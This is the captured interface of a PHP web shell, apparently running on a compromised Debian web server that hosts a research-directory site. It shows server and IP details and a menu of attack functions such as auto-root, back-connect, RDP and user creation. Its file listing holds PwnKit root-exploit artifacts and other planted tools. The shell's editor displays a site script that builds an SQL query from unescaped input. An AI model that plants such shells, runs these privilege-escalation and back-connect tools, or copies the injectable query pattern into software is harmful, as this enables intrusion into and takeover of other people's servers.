Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
ris /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
_test
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
mods
[ DIR ]
drwxr-xr-x
pics
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_config.php
247
B
-rw-r--r--
_json.php
747
B
-rw-r--r--
_lib.php
1.06
KB
-rw-r--r--
action.php
602
B
-rw-r--r--
admin.php
4.42
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ajax.php
1.08
KB
-rw-r--r--
areas_of_operation.php
11.18
KB
-rw-r--r--
areas_of_operation_test.php
11.18
KB
-rw-r--r--
footer.php
265
B
-rw-r--r--
inde-4.php
871.03
KB
-rw-r--r--
index.php
11.8
KB
-rw-r--r--
index1.php
11.98
KB
-rw-r--r--
innovation_find.php
11.56
KB
-rw-r--r--
innovation_fox.php
584
B
-rw-r--r--
innovations.php
13.44
KB
-rw-r--r--
localhost.sql
1.8
MB
-rw-r--r--
publication_find.php
11.87
KB
-rw-r--r--
publications.php
21.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
research_find.php
10.06
KB
-rw-r--r--
research_view.php
8.06
KB
-rw-r--r--
researcher_faculty.php
9.87
KB
-rw-r--r--
researcher_find.php
9.52
KB
-rw-r--r--
researcher_info.php
13.07
KB
-rw-r--r--
researchers.php
15.65
KB
-rw-r--r--
researches.php
16.27
KB
-rw-r--r--
scan.php
0
B
-rw-r--r--
tenka.massupload.v1.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.php
<?php include "_lib.php"; $model = $g_util->getParam('model', ''); $lat = $g_util->getParam('lat', '13.792025'); // กำหนดค่าละติจูด $lon = $g_util->getParam('long', '101.425291'); // กำหนดค่าลองจิจูด $geo_array = array (); //set option for usign openstreetmap by using file_get_contents $opts = array('http'=>array('header'=>"User-Agent: StevesCleverAddressScript 3.7.6\r\n")); $context = stream_context_create($opts); //url for the openstreetmap $homepage = file_get_contents("https://nominatim.openstreetmap.org/reverse?format=json&lat=".$lat."&lon=".$lon."&zoom=27&addressdetails=1",false,$context); echo $homepage; $homepage_json = json_decode($homepage,1); $district = $homepage_json["address"]["municipality"]; $sql = "SELECT DISTRICT_ID, AMPHUR_ID, PROVINCE_ID FROM area_districts WHERE DISTRICT_NAME='".$district."' "; $area = $g_db->getObject($sql); echo '{"DISTRICT_ID":'.$area->DISTRICT_ID.', "AMPHUR_ID":'.$area->AMPHUR_ID.', "PROVINCE_ID":'.$area->PROVINCE_ID.'}'; ?>
Close